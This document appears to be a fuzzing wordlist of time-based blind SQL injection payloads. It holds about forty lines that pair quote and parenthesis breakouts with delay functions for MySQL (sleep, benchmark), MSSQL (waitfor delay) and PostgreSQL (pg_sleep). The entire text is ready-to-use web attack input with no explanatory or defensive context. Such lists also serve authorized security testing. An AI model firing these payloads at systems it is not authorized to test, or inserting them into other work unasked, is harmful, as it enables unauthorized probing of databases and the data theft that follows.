sleep(05)#
1 or sleep(05)#
" or sleep(05)#
' or sleep(05)#
" or sleep(05)="
' or sleep(05)='
1) or sleep(05)#
") or sleep(05)="
') or sleep(05)='
1)) or sleep(05)#
")) or sleep(05)="
')) or sleep(05)='
;waitfor delay '0:0:05'-- 
);waitfor delay '0:0:05'-- 
';waitfor delay '0:0:05'-- 
";waitfor delay '0:0:05'-- 
');waitfor delay '0:0:05'-- 
");waitfor delay '0:0:05'-- 
));waitfor delay '0:0:05'-- 
'));waitfor delay '0:0:05'-- 
"));waitfor delay '0:0:05'-- 
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(05)-- 
1 or pg_sleep(05)-- 
" or pg_sleep(05)-- 
' or pg_sleep(05)-- 
1) or pg_sleep(05)--  
") or pg_sleep(05)-- 
') or pg_sleep(05)-- 
1)) or pg_sleep(05)-- 
")) or pg_sleep(05)-- 
')) or pg_sleep(05)-- 